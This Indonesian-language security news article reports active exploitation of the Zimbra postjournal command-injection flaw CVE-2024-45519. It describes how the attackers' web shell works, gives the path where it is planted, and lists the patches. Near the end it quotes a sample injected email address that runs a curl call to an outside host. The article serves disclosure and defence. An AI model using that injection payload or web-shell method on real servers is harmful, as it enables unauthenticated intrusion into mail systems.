CVE-2024-45519 ZIMBRA
Para peneliti keamanan siber memperingatkan adanya upaya eksploitasi aktif yang menargetkan kerentanan keamanan yang baru terungkap dalam Zimbra Collaboration dari Synacor.
Perusahaan keamanan siber, Proofpoint, mengatakan bahwa mereka mulai mengamati aktivitas ini sejak 28 September 2024. Serangan tersebut mencoba mengeksploitasi CVE-2024-45519, yaitu kerentanan keamanan kritis dalam layanan postjournal Zimbra yang dapat memungkinkan penyerang tanpa otentikasi untuk menjalankan perintah arbitrer pada instalasi yang terdampak.
“Email yang meniru Gmail dikirim ke alamat palsu di bidang CC dalam upaya agar server Zimbra mengurai dan menjalankannya sebagai perintah,” kata Proofpoint dalam serangkaian unggahan di X. “Alamat tersebut berisi string Base64 yang dieksekusi dengan utilitas sh.”
Masalah kritis ini telah diatasi oleh Zimbra dalam versi 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, dan 10.1.1 yang dirilis pada 4 September 2024. Seorang peneliti keamanan bernama lebr0nli (Alan Li) diberi kredit atas penemuan dan pelaporan kekurangan ini.
“Walaupun fitur postjournal mungkin opsional atau tidak diaktifkan pada sebagian besar sistem, sangat penting untuk menerapkan patch yang disediakan untuk mencegah potensi eksploitasi,” kata Ashish Kataria, seorang insinyur arsitek keamanan di Synacor, dalam sebuah komentar pada 19 September 2024.
“Untuk sistem Zimbra di mana fitur postjournal tidak diaktifkan dan patch tidak dapat diterapkan segera, menghapus file biner postjournal dapat dipertimbangkan sebagai tindakan sementara hingga patch dapat diterapkan.”
Proofpoint mengatakan bahwa mereka mengidentifikasi serangkaian alamat yang dicantumkan di CC, yang ketika di-decode, mencoba menulis shell web pada server Zimbra yang rentan di lokasi: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp.”
Shell web yang dipasang kemudian mendengarkan koneksi masuk dengan field Cookie JSESSIONID yang telah ditentukan, dan jika ada, ia akan mengurai cookie JACTION untuk perintah Base64.
Shell web ini dilengkapi dengan dukungan untuk menjalankan perintah melalui exec. Sebagai alternatif, shell ini juga dapat mengunduh dan menjalankan file melalui koneksi soket. Hingga saat ini, serangan ini belum dikaitkan dengan aktor atau kelompok ancaman yang diketahui.
Namun demikian, aktivitas eksploitasi tampaknya dimulai sehari setelah Project Discovery merilis detail teknis mengenai kerentanan ini, yang menyatakan bahwa masalah ini “berasal dari input pengguna yang tidak di-sanitasi yang diteruskan ke popen dalam versi yang tidak diperbarui, memungkinkan penyerang untuk menyisipkan perintah arbitrer.”
Perusahaan keamanan siber tersebut mengatakan bahwa masalah ini berakar pada cara file biner postjournal berbasis C menangani dan menguraikan alamat email penerima dalam fungsi yang disebut “msg_handler(),” sehingga memungkinkan injeksi perintah pada layanan yang berjalan di port 10027 saat melewati pesan SMTP yang dirancang khusus dengan alamat palsu (misalnya, “aabbb$(curl${IFS}oast.me)”@mail.domain.com).
Mengingat adanya upaya eksploitasi aktif, pengguna sangat dianjurkan untuk segera menerapkan patch terbaru guna perlindungan optimal terhadap potensi ancaman.